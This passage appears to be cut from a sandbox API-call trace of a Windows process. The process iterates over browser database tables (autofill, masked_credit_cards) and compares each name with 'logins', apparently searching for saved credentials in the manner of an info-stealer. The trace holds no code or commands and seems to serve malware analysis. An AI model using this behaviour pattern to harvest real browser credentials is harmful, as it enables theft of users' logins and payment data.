ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.116] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.116] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.116] IStream:LockRegion (This=0x57ea78, libOffset=0x69dc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.116] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.116] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.116] LocalFree (hMem=0x2f09968) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.116] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.116] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56fe98 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.116] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.116] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.116] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.116] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.116] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.116] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.116] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.116] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.116] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.116] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0590.116] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.116] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.116] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.116] LocalAlloc (uFlags=0x40, uBytes=0x9f) returned 0x5d1a20 [0590.116] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.116] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0590.116] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.117] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.117] IStream:LockRegion (This=0x5ec250, libOffset=0x23, cb=0x0, dwLockType=0x0) returned 0x0 [0590.117] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.117] LocalAlloc (uFlags=0x40, uBytes=0x9f) returned 0x5d1978 [0590.117] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.117] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.117] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.117] IStream:LockRegion (This=0x5ec250, libOffset=0x3a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.117] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.117] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0590.117] LocalAlloc (uFlags=0x40, uBytes=0xc4) returned 0x5d73b0 [0590.117] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.117] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.117] IStream:LockRegion (This=0x5ec250, libOffset=0x3b, cb=0x0, dwLockType=0x0) returned 0x0 [0590.117] IStream:SetSize (This=0x5ec250, libNewSize=0x5d73b0) returned 0x0 [0590.117] LocalAlloc (uFlags=0x40, uBytes=0xcc) returned 0x5977a0 [0590.117] LocalFree (hMem=0x5d73b0) returned 0x0 [0590.117] LocalFree (hMem=0x56fe98) returned 0x0 [0590.117] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.117] lstrcmpiA (lpString1="autofill_profile_phones", lpString2="logins") returned -1 [0590.117] LocalFree (hMem=0x58d548) returned 0x0 [0590.117] LocalFree (hMem=0x5d1a20) returned 0x0 [0590.117] LocalFree (hMem=0x5d1978) returned 0x0 [0590.117] LocalFree (hMem=0x58d970) returned 0x0 [0590.117] LocalFree (hMem=0x5977a0) returned 0x0 [0590.117] LocalFree (hMem=0x570078) returned 0x0 [0590.117] IStream:LockRegion (This=0x57ea78, libOffset=0x696a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.117] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.117] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.117] IStream:LockRegion (This=0x57ea78, libOffset=0x696a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.117] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.117] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.117] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.117] IStream:LockRegion (This=0x57ea78, libOffset=0x696b, cb=0x0, dwLockType=0x0) returned 0x0 [0590.117] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.117] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.117] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.117] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.117] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.117] IStream:LockRegion (This=0x57ea78, libOffset=0x696c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.117] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.117] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.117] LocalFree (hMem=0x2f09968) returned 0x0 [0590.117] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.117] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.117] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.117] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.117] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.117] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.117] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.117] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.117] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.117] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.117] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.117] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.117] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.118] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.118] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.118] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.118] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.118] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56fe98 [0590.118] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.118] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.118] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0590.118] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.118] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.118] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.118] LocalAlloc (uFlags=0x40, uBytes=0x9f) returned 0x5d1978 [0590.118] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.118] LocalAlloc (uFlags=0x40, uBytes=0x97) returned 0x56ffd8 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x22, cb=0x0, dwLockType=0x0) returned 0x0 [0590.118] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.118] LocalAlloc (uFlags=0x40, uBytes=0x9f) returned 0x5d1a20 [0590.118] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x39, cb=0x0, dwLockType=0x0) returned 0x0 [0590.118] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.118] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.118] LocalAlloc (uFlags=0x40, uBytes=0xb4) returned 0x2ed72a0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.118] IStream:LockRegion (This=0x5ec250, libOffset=0x3a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.118] IStream:SetSize (This=0x5ec250, libNewSize=0x2ed72a0) returned 0x0 [0590.118] LocalAlloc (uFlags=0x40, uBytes=0xbc) returned 0x5b7378 [0590.118] LocalFree (hMem=0x2ed72a0) returned 0x0 [0590.118] LocalFree (hMem=0x570078) returned 0x0 [0590.118] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.118] lstrcmpiA (lpString1="autofill_profiles_trash", lpString2="logins") returned -1 [0590.118] LocalFree (hMem=0x58d970) returned 0x0 [0590.118] LocalFree (hMem=0x5d1978) returned 0x0 [0590.118] LocalFree (hMem=0x5d1a20) returned 0x0 [0590.118] LocalFree (hMem=0x58d548) returned 0x0 [0590.118] LocalFree (hMem=0x5b7378) returned 0x0 [0590.118] LocalFree (hMem=0x56fe98) returned 0x0 [0590.118] IStream:LockRegion (This=0x57ea78, libOffset=0x6f23, cb=0x0, dwLockType=0x0) returned 0x0 [0590.118] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.118] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.118] IStream:LockRegion (This=0x57ea78, libOffset=0x6f23, cb=0x0, dwLockType=0x0) returned 0x0 [0590.118] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.118] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.119] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.119] IStream:LockRegion (This=0x57ea78, libOffset=0x6f24, cb=0x0, dwLockType=0x0) returned 0x0 [0590.119] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.119] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.119] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.119] IStream:LockRegion (This=0x57ea78, libOffset=0x6f25, cb=0x0, dwLockType=0x0) returned 0x0 [0590.119] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.119] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.119] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.119] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.119] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.119] IStream:LockRegion (This=0x57ea78, libOffset=0x6f26, cb=0x0, dwLockType=0x0) returned 0x0 [0590.119] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.119] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.119] LocalFree (hMem=0x2f09968) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.119] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.119] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56fe98 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.119] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.119] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.119] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.119] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.119] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.119] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.119] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.119] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.119] IStream:LockRegion (This=0x5ec250, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.119] IStream:SetSize (This=0x5ec250, libNewSize=0x57c6e0) returned 0x0 [0590.119] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d548 [0590.119] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.119] LocalAlloc (uFlags=0x40, uBytes=0x93) returned 0x56ffd8 [0590.120] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.120] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.120] IStream:LockRegion (This=0x5ec250, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.120] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.120] LocalAlloc (uFlags=0x40, uBytes=0x9b) returned 0x5d1a20 [0590.120] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.120] LocalAlloc (uFlags=0x40, uBytes=0x93) returned 0x56ffd8 [0590.120] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.120] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.120] IStream:LockRegion (This=0x5ec250, libOffset=0x1f, cb=0x0, dwLockType=0x0) returned 0x0 [0590.120] IStream:SetSize (This=0x5ec250, libNewSize=0x56ffd8) returned 0x0 [0590.120] LocalAlloc (uFlags=0x40, uBytes=0x9b) returned 0x5d1978 [0590.120] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.120] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.120] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.120] IStream:LockRegion (This=0x5ec250, libOffset=0x32, cb=0x0, dwLockType=0x0) returned 0x0 [0590.120] IStream:SetSize (This=0x5ec250, libNewSize=0x52da1f) returned 0x0 [0590.120] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0590.120] LocalAlloc (uFlags=0x40, uBytes=0x127) returned 0x5d5128 [0590.120] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.120] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.120] IStream:LockRegion (This=0x5ec250, libOffset=0x33, cb=0x0, dwLockType=0x0) returned 0x0 [0590.120] IStream:SetSize (This=0x5ec250, libNewSize=0x5d5128) returned 0x0 [0590.120] LocalAlloc (uFlags=0x40, uBytes=0x12f) returned 0x2f09968 [0590.120] LocalFree (hMem=0x5d5128) returned 0x0 [0590.120] LocalFree (hMem=0x56fe98) returned 0x0 [0590.120] IUnknown:Release (This=0x5ec250) returned 0x0 [0590.120] lstrcmpiA (lpString1="masked_credit_cards", lpString2="logins") returned 1 [0590.120] LocalFree (hMem=0x58d548) returned 0x0 [0590.120] LocalFree (hMem=0x5d1a20) returned 0x0 [0590.120] LocalFree (hMem=0x5d1978) returned 0x0 [0590.120] LocalFree (hMem=0x58d970) returned 0x0 [0590.120] LocalFree (hMem=0x2f09968) returned 0x0 [0590.120] LocalFree (hMem=0x570078) returned 0x0 [0590.120] IStream:LockRegion (This=0x57ea78, libOffset=0x6e29, cb=0x0, dwLockType=0x0) returned 0x0 [0590.120] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.120] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.120] IStream:LockRegion (This=0x57ea78, libOffset=0x6e29, cb=0x0, dwLockType=0x0) returned 0x0 [0590.120] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.120] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.120] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.120] IStream:LockRegion (This=0x57ea78, libOffset=0x6e2a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.120] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.120] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.120] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.120] IStream:LockRegion (This=0x57ea78, libOffset=0x6e2b, cb=0x0, dwLockType=0x0) returned 0x0 [0590.120] IStream:SetSize (This=0x57ea78, libNewSize=0x52da6b) returned 0x0 [0590.120] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x2f09968 [0590.120] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52da80 | out: ppstm=0x52da80*=0x5ec250) returned 0x0 [0590.120] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.120] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.120] IStream:LockRegion (This=0x57ea78, libOffset=0x6e2c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.120] IStream:SetSize (This=0x57ea78, libNewSize=0x2f09968) returned 0x0 [0590.120] IStream:Commit (This=0x5ec250, grfCommitFlags=0x2f09968) returned 0x0 [0590.120] LocalFree (hMem=0x2f09968) returned 0x0 [0590.120] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.121] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.121] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x570078 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.121] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.121] IStream:SetSize (This=0x5ec250, libNewSize=0x52da2b) returned 0x0 [0590.121] IStream:LockRegion (This=0x5ec250, 